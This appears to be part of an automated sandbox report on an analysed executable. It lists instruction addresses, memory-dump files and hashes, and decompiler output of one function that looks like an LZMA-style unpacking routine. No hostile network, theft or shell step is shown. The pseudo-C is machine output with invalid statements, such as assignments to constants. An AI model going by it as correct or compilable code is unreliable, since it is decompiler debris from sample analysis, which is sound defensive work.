                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x0040652a
                                                                                                                          0x0040652f
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040618d
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a0
                                                                                                                          0x004061a3
                                                                                                                          0x004061a6
                                                                                                                          0x004061a9
                                                                                                                          0x004061ab
                                                                                                                          0x004061ae
                                                                                                                          0x004061b1
                                                                                                                          0x004061b4
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406318
                                                                                                                          0x00406318
                                                                                                                          0x0040631c
                                                                                                                          0x004067e2
                                                                                                                          0x00000000
                                                                                                                          0x004067e2
                                                                                                                          0x00406322
                                                                                                                          0x00406325
                                                                                                                          0x00406328
                                                                                                                          0x0040632b
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x00406330
                                                                                                                          0x00406333
                                                                                                                          0x00406336
                                                                                                                          0x00406339
                                                                                                                          0x0040633c
                                                                                                                          0x0040633f
                                                                                                                          0x00406340
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406345
                                                                                                                          0x00406348
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x00406351
                                                                                                                          0x00406353
                                                                                                                          0x00406353
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406599
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065a5
                                                                                                                          0x004065a8
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065ad
                                                                                                                          0x004065b0
                                                                                                                          0x004065b3
                                                                                                                          0x004065b6
                                                                                                                          0x004065b9
                                                                                                                          0x004065bc
                                                                                                                          0x004065bd
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065c2
                                                                                                                          0x004065c5
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x004065ce
                                                                                                                          0x004065d2
                                                                                                                          0x004065d4
                                                                                                                          0x004065d7
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x00406356
                                                                                                                          0x00406356
                                                                                                                          0x00000000
                                                                                                                          0x00406356
                                                                                                                          0x004065d7
                                                                                                                          0x0040680c
                                                                                                                          0x0040682e
                                                                                                                          0x00406834
                                                                                                                          0x00406836
                                                                                                                          0x0040683d
                                                                                                                          0x0040683f
                                                                                                                          0x00406846
                                                                                                                          0x0040684a
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00000000
                                                                                                                          0x00406843
                                                                                                                          0x00406690
                                                                                                                          0x00406716
                                                                                                                          0x0040671c
                                                                                                                          0x0040671f
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406737
                                                                                                                          0x00406750
                                                                                                                          0x00406753
                                                                                                                          0x00406756
                                                                                                                          0x00406759
                                                                                                                          0x0040675d
                                                                                                                          0x0040675f
                                                                                                                          0x00406760
                                                                                                                          0x00406763
                                                                                                                          0x00406739
                                                                                                                          0x00406739
                                                                                                                          0x00406741
                                                                                                                          0x00406746
                                                                                                                          0x00406748
                                                                                                                          0x0040674b
                                                                                                                          0x0040674b
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x004065e2

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                                                                                                          • Instruction ID: 736e54d1ea8bc2ffbcc58a3ee687e8f06aed80bce92bf0dad63538ea203c4f31
                                                                                                                          • Opcode Fuzzy Hash: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                                                                                                          • Instruction Fuzzy Hash: 77913271D00229CBDF28CF98C844BADBBB1FF44305F15816AD856BB281D7789A86DF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004062F4, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004062F4() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M0040684B))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
